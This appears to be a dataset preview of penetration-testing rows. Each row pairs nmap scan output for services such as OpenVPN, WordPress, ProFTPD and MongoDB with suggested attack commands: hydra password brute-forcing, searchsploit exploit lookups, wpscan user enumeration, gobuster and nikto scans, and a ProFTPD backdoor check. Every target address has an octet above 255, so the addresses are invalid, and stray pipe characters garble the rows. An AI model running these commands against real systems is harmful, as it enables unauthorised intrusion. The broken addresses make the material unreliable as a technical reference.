PORT     STATE SERVICE  VERSION
1194/tcp open  openvpn  OpenVPN 2.4.7 | 
	nmap --script=openvpn-version -p 1194 10.10.10.300
searchsploit openvpn 2.4.7
hydra -l user -P /path/to/wordlist.txt openvpn://10.10.10.300 | |
| 
	Host is up (0.0031s latency).
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.38
| http-title: WordPress
|_  HTTP/1.1 200 OK | 
	wpscan --url http://10.10.10.310 --enumerate u
searchsploit wordpress
gobuster dir -u http://10.10.10.310 -w /path/to/wordlist.txt | |
| 
	Host is up (0.0023s latency).
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Nginx 1.17.9 | 
	nikto -h http://10.10.10.320
searchsploit nginx 1.17.9
gobuster dir -u http://10.10.10.320 -w /path/to/wordlist.txt | |
| 
	Host is up (0.0010s latency).
PORT     STATE SERVICE  VERSION
5432/tcp open  postgresql PostgreSQL 9.6.10 | 
	nmap --script=pgsql-info -p 5432 10.10.10.330
psql -h 10.10.10.330 -U postgres
searchsploit postgresql 9.6.10 | |
| 
	Host is up (0.0011s latency).
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.5 | 
	hydra -l anonymous -P /path/to/wordlist.txt ftp://10.10.10.340
nmap --script=ftp-proftpd-backdoor -p 21 10.10.10.340
searchsploit proftpd 1.3.5 | |
| 
	Host is up (0.0022s latency).
PORT     STATE SERVICE  VERSION
27017/tcp open  mongodb  MongoDB 4.0.10 | 
	nmap --script=mongodb-databases -p 27017 10.10.10.350
mongo 10.10.10.350 --port 27017
searchsploit mongodb 4.0.10 | 
			Subsets and Splits
				
	
				
			
				
No community queries yet
The top public SQL queries from the community will appear here once available.